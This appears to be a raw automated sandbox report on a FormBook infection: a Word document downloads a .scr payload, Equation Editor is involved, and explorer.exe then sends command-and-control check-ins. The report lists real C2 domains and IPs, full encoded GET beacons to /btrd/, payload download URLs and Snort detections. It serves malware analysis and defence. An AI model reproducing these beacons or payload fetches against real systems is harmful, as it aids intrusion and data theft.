      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49172
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49172
      Source: global traffic, TCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 172.67.162.95:443 -> 192.168.2.22:49172
      Source: global traffic, TCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global traffic, TCP traffic: 192.168.2.22:49172 -> 172.67.162.95:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 104.21.74.191:443
      Source: global trafficTCP traffic: 104.21.74.191:443 -> 192.168.2.22:49173

      Networking

      Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49176 -> 104.21.89.47:80
      Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49177 -> 15.197.148.33:80
      Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49178 -> 167.172.228.26:80
      Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49179 -> 15.197.148.33:80
      Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49180 -> 3.33.130.190:80
      Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49181 -> 5.149.161.103:80
      Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49182 -> 156.241.141.214:80
      Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49183 -> 192.243.61.227:80
      Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49184 -> 23.227.38.74:80
      Source: C:\Windows\explorer.exe | Domain query: www.cnoszirzbkaqz.com
      Source: C:\Windows\explorer.exe | Domain query: www.onlynaturlpt.shop
      Source: C:\Windows\explorer.exe | Network Connect: 104.21.89.47 80
      Source: C:\Windows\explorer.exe | Network Connect: 156.241.141.214 80
      Source: C:\Windows\explorer.exe | Domain query: www.turbrun.com
      Source: C:\Windows\explorer.exe | Network Connect: 5.149.161.103 80
      Source: C:\Windows\explorer.exe | Domain query: www.outletivo.com
      Source: C:\Windows\explorer.exe | Network Connect: 15.197.148.33 80
      Source: C:\Windows\explorer.exe | Domain query: www.naddafornadda.com
      Source: C:\Windows\explorer.exe | Network Connect: 192.243.61.227 80
      Source: C:\Windows\explorer.exe | Domain query: www.wirewizardselectric.net
      Source: C:\Windows\explorer.exe | Domain query: www.wzxq.xyz
      Source: C:\Windows\explorer.exe | Network Connect: 167.172.228.26 80
      Source: C:\Windows\explorer.exe | Domain query: www.380747.net
      Source: C:\Windows\explorer.exe | Domain query: www.texanboxes.com
      Source: C:\Windows\explorer.exe | Network Connect: 3.33.130.190 80
      Source: C:\Windows\explorer.exe | Domain query: www.emeraldsurrogatefabric.com
      Source: Malware configuration extractor | URLs: www.cnoszirzbkaqz.com/btrd/
      Source: C:\Windows\explorer.exe | DNS query: www.wzxq.xyz
      Source: global traffic | HTTP traffic detected: GET /btrd/?QF=ei06BbrL1XNnLWKSHbPo044PuME3Vv+0MArEui1DSIZtlWDrcB5dDFtUvldPnIarUtM2xw==&rr=F82tHBM8VV6X-vo HTTP/1.1 | Host: www.onlynaturlpt.shop | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /btrd/?QF=4g1xeR4m3EPNXFQvrJzB56K+BPAX9uki7kS+nMlSCcqOR13OJ5fSn6jCC3gh4c3HUzbxQw==&rr=F82tHBM8VV6X-vo HTTP/1.1 | Host: www.wirewizardselectric.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /btrd/?QF=iWZ7HQ0CWyfkF/Kk3421ksonIyAGE9NlyJN9a/ri56tzwIjQ6AOy1EoBknvhN8HBdF2LXg==&rr=F82tHBM8VV6X-vo HTTP/1.1 | Host: www.cnoszirzbkaqz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /btrd/?QF=Y4OHzCgJWVe/aTk998zcBEsdCVoOVR410Fz81Fwxat8Qm64dtgVu5ywIvZ7n99il4dROUQ==&rr=F82tHBM8VV6X-vo HTTP/1.1 | Host: www.naddafornadda.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /btrd/?QF=8JOSXYLBILqnqGN87u1l6qhyR4gCsQ4B50iPBg5WSNoqgl4+2/FdKIi+y78puliTpEIA7Q==&rr=F82tHBM8VV6X-vo HTTP/1.1 | Host: www.texanboxes.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /btrd/?QF=wAVsI0ZauuZe/AUfKMQS9arC9N7mEche6F3f3LieAEN9BV05ageRHgJkodQ/PaJpE4394Q==&rr=F82tHBM8VV6X-vo HTTP/1.1 | Host: www.outletivo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /btrd/?QF=Q9lQV6GZS5XlTzDabQN0JcC/oAJcX56bqSzBmZTdiCofqsMdr9nyT/BrN0q/NN7gaO6C5w==&rr=F82tHBM8VV6X-vo HTTP/1.1 | Host: www.380747.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /btrd/?QF=G5lr6/+HMLb4/5wZr2dUNb9GEJVmzQOhD2on9EEX18ujBqnljNww4TGU/x6wH+Q7WyKaqg==&rr=F82tHBM8VV6X-vo HTTP/1.1 | Host: www.emeraldsurrogatefabric.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: Joe Sandbox View | IP Address: 172.67.162.95
      Source: Joe Sandbox View | IP Address: 15.197.148.33
      Source: Joe Sandbox View | IP Address: 104.21.74.191
      Source: Joe Sandbox View | IP Address: 192.243.61.227
      Source: Joe Sandbox View | IP Address: 192.243.61.227
      Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
      Source: Joe Sandbox View | ASN Name: TANDEMUS
      Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
      Source: Joe Sandbox View | ASN Name: ADVANCEDHOSTERS-ASNL
      Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
      Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: global traffic | HTTP traffic detected: GET /nelb.doc HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | Host: universalmovies.top | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /nelb.scr HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: universalmovies.top | Connection: Keep-Alive
      Source: unknown | HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49167 version: TLS 1.0
      Source: unknown | HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49168 version: TLS 1.0
      Source: unknown | HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49169 version: TLS 1.0
      Source: unknown | HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49170 version: TLS 1.0
      Source: unknown | HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49174 version: TLS 1.0
      Source: unknown | HTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49175 version: TLS 1.0
      Source: C:\Windows\explorer.exe | Code function: 13_2_08D62F82 getaddrinfo,setsockopt,recv,13_2_08D62F82
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{61FC82B4-E053-4F29-B36E-352ECE0A54D4}.tmp
      Source: global traffic | HTTP traffic detected: GET /nelb.doc HTTP/1.1 | Accept: */* | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | Host: universalmovies.top | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /nelb.scr HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: universalmovies.top | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /btrd/?QF=ei06BbrL1XNnLWKSHbPo044PuME3Vv+0MArEui1DSIZtlWDrcB5dDFtUvldPnIarUtM2xw==&rr=F82tHBM8VV6X-vo HTTP/1.1 | Host: www.onlynaturlpt.shop | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /btrd/?QF=4g1xeR4m3EPNXFQvrJzB56K+BPAX9uki7kS+nMlSCcqOR13OJ5fSn6jCC3gh4c3HUzbxQw==&rr=F82tHBM8VV6X-vo HTTP/1.1 | Host: www.wirewizardselectric.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /btrd/?QF=iWZ7HQ0CWyfkF/Kk3421ksonIyAGE9NlyJN9a/ri56tzwIjQ6AOy1EoBknvhN8HBdF2LXg==&rr=F82tHBM8VV6X-vo HTTP/1.1 | Host: www.cnoszirzbkaqz.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /btrd/?QF=Y4OHzCgJWVe/aTk998zcBEsdCVoOVR410Fz81Fwxat8Qm64dtgVu5ywIvZ7n99il4dROUQ==&rr=F82tHBM8VV6X-vo HTTP/1.1 | Host: www.naddafornadda.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /btrd/?QF=8JOSXYLBILqnqGN87u1l6qhyR4gCsQ4B50iPBg5WSNoqgl4+2/FdKIi+y78puliTpEIA7Q==&rr=F82tHBM8VV6X-vo HTTP/1.1 | Host: www.texanboxes.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /btrd/?QF=wAVsI0ZauuZe/AUfKMQS9arC9N7mEche6F3f3LieAEN9BV05ageRHgJkodQ/PaJpE4394Q==&rr=F82tHBM8VV6X-vo HTTP/1.1 | Host: www.outletivo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /btrd/?QF=Q9lQV6GZS5XlTzDabQN0JcC/oAJcX56bqSzBmZTdiCofqsMdr9nyT/BrN0q/NN7gaO6C5w==&rr=F82tHBM8VV6X-vo HTTP/1.1 | Host: www.380747.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: global traffic | HTTP traffic detected: GET /btrd/?QF=G5lr6/+HMLb4/5wZr2dUNb9GEJVmzQOhD2on9EEX18ujBqnljNww4TGU/x6wH+Q7WyKaqg==&rr=F82tHBM8VV6X-vo HTTP/1.1 | Host: www.emeraldsurrogatefabric.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
      Source: global traffic | DNS traffic detected: DNS query: universalmovies.top
      Source: global traffic | DNS traffic detected: DNS query: www.onlynaturlpt.shop
      Source: global traffic | DNS traffic detected: DNS query: www.wirewizardselectric.net
      Source: global traffic | DNS traffic detected: DNS query: www.cnoszirzbkaqz.com
      Source: global traffic | DNS traffic detected: DNS query: www.naddafornadda.com
      Source: global traffic | DNS traffic detected: DNS query: www.turbrun.com
      Source: global traffic | DNS traffic detected: DNS query: www.wzxq.xyz
      Source: global traffic | DNS traffic detected: DNS query: www.texanboxes.com
      Source: global traffic | DNS traffic detected: DNS query: www.outletivo.com
      Source: global traffic | DNS traffic detected: DNS query: www.380747.net
      Source: global traffic | DNS traffic detected: DNS query: www.emeraldsurrogatefabric.com
      Source: global traffic | DNS traffic detected: DNS query: www.furryfriendsupply.store
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 25 Jun 2024 13:17:17 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 0 | Connection: close
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398056929.00000000005F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
      Source: explorer.exe, 0000000D.00000002.923496286.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://java.sun.com
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398056929.00000000005F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398056929.00000000005F1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net03
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.380747.net
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.380747.net/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.380747.net/btrd/www.emeraldsurrogatefabric.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.380747.netReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.agriwithai.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.agriwithai.com/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.agriwithai.com/btrd/www.ngbbvuhkm5.asia
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.agriwithai.comReferer:
      Source: explorer.exe, 0000000D.00000002.923496286.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.400671718.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.cnoszirzbkaqz.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.cnoszirzbkaqz.com/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.cnoszirzbkaqz.com/btrd/www.naddafornadda.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.cnoszirzbkaqz.comReferer:
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
      Source: EQNEDT32.EXE, 00000009.00000002.398265813.0000000000631000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000003.398046437.000000000062A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.emeraldsurrogatefabric.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.emeraldsurrogatefabric.com/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.emeraldsurrogatefabric.com/btrd/www.furryfriendsupply.store
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.emeraldsurrogatefabric.comReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.everslane.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.everslane.com/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.everslane.com/btrd/www.nvzhuang1.net
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.everslane.comReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.furryfriendsupply.store
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.furryfriendsupply.store/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.furryfriendsupply.store/btrd/www.agriwithai.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.furryfriendsupply.storeReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.martline.website
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.martline.website/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.martline.website/btrd/www.cnoszirzbkaqz.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.martline.websiteReferer:
      Source: explorer.exe, 0000000D.00000000.401767743.0000000002177000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.923732332.0000000002177000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.mozilla.com0
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.naddafornadda.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.naddafornadda.com/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.naddafornadda.com/btrd/www.turbrun.com
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.naddafornadda.comReferer:
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ngbbvuhkm5.asia
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ngbbvuhkm5.asia/btrd/
      Source: explorer.exe, 0000000D.00000002.924484716.0000000007526000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.ngbbvuhkm5.asia/btrd/www.everslane.com
